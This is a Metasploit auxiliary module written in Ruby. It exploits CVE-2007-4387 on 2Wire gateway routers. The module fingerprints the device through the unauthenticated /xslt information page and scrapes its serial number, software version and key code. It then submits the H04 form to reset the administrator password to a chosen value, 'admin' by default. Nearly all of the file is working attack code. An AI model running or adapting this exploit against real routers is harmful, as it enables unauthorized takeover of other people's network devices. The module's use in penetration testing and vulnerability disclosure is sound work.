##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2007-4387 (2Wire gateway, unauthenticated /xslt
# configuration pages).
#
# Flow: GET the A07 information page and require an HTTP 200, a Server header
# matching "2wire Gateway" and a 5.x software version string; print the scraped
# device details; GET the H04 password page and require its title; only then
# POST the H04 form with the PASSWORD option. Any failed precondition prints an
# error and returns without changing configuration.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Label / pattern pairs for the informational fields scraped from PAGE=A07.
  # Capture group 1 is what gets printed; a field that does not match is skipped.
  INFO_FIELDS = [
    ['Model', %r{<td class="textmono">(.*)</td>}i],
    ['Serial', %r{<td class="data">(\d{12})</td>}i],
    ['Hardware Version', %r{<td class="data">(\d{4}-\d{6}-\d{3})</td>}i]
  ].freeze

  # Only a 5.x software version is handled; anything else aborts the run.
  VERSION_RE = %r{<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>}i
  KEY_CODE_RE = %r{<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})</td>}i
  PASSWORD_PAGE_RE = %r{<title>System Setup - Password</title>}i
  COOKIE_RE = %r{(.*); path=/}

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '2Wire Cross-Site Request Forgery Password Reset Vulnerability',
        'Description' => %q{
          This module will reset the admin password on a 2Wire wireless router. This is
          done by using the /xslt page where authentication is not required, thus allowing
          configuration changes (such as resetting the password) as administrators.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'hkm [at] hakim.ws', # Initial discovery, poc
          'Travis Phillips', # Msf module
        ],
        'References' => [
          [ 'CVE', '2007-4387' ],
          [ 'OSVDB', '37667' ],
          [ 'BID', '36075' ],
          [ 'URL', 'https://seclists.org/bugtraq/2007/Aug/225' ],
        ],
        'DisclosureDate' => '2007-08-15',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('PASSWORD', [true, 'The password to reset to', 'admin'])
      ]
    )
  end

  # The vulnerable page needs no credentials, so there is no post-auth phase.
  def post_auth?
    false
  end

  # Fingerprint the target, then submit the password-reset form.
  #
  # Each precondition (response received, HTTP 200, 2wire Server header,
  # 5.x version, password page present) prints an error and returns early,
  # so the POST is only sent when all checks pass.
  def run
    print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
    info_page = fetch_xslt_page('A07')

    unless info_page
      print_error('No response from server')
      return
    end

    unless info_page.code == 200
      print_error('Did not get HTTP 200, URL was not found. Exiting!')
      return
    end
    print_status('Okay, Got an HTTP 200 (okay) code. Verifying Server header')

    # NOTE: a missing Server header raises NoMethodError here (nil.match?),
    # exactly as the original .match call did.
    unless info_page.headers['Server'].match?(/2wire Gateway/i)
      print_error("Target doesn't seem to be a 2wire router. Exiting!")
      return
    end
    print_status("Server is a 2wire Gateway! Grabbing info\n")

    return unless report_device_info(info_page.body)

    print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
    print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
    form_page = fetch_xslt_page('H04')
    return unless form_page && form_page.code == 200 && form_page.body.match?(PASSWORD_PAGE_RE)

    submit_password_reset
  end

  private

  # GET /xslt?PAGE=<page> with the module's fixed 25 second timeout.
  #
  # @param page [String] the PAGE query value (e.g. 'A07', 'H04')
  # @return [Rex::Proto::Http::Response, nil] nil when no response arrived
  def fetch_xslt_page(page)
    send_request_raw(
      {
        'method' => 'GET',
        'uri' => "/xslt?PAGE=#{page}"
      }, 25
    )
  end

  # Print the device details scraped from the A07 page body.
  #
  # @param body [String] response body of PAGE=A07
  # @return [Boolean] false when no 5.x software version was found (an error
  #   is printed), true otherwise
  def report_device_info(body)
    print_status('---===[ Router Information ]===---')

    INFO_FIELDS.each do |label, pattern|
      value = body[pattern, 1]
      print_status("#{label}: #{value}") if value
    end

    version = body[VERSION_RE, 1]
    unless version
      print_error('Target is not a version 5 router. Exiting!')
      return false
    end
    print_status("Software version: #{version}")

    key_code = body[KEY_CODE_RE, 1]
    print_status("Key Code: #{key_code}\n") if key_code
    true
  end

  # POST the H04 password form and report the cookie the gateway hands back.
  def submit_password_reset
    new_password = datastore['PASSWORD']
    print_status("Found password reset page. Attempting to reset admin password to #{new_password}")

    # Form body for the H04 page. The PASSWORD value is inserted verbatim
    # (no URI encoding), matching the original module's behaviour.
    form_body = [
      'PAGE=H04_POST',
      'THISPAGE=H04',
      'NEXTPAGE=A01',
      "PASSWORD=#{new_password}",
      "PASSWORD_CONF=#{new_password}",
      'HINT='
    ].join('&')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => '/xslt',
        'data' => form_body
      }, 25
    )
    return unless res && res.code == 200

    # Success is inferred from a Set-Cookie value with a "; path=/" attribute.
    cookies = res.get_cookies
    cookie = cookies && cookies[COOKIE_RE, 1]
    print_good("Got cookie #{cookie}. Password reset was successful!\n") if cookie
  end
end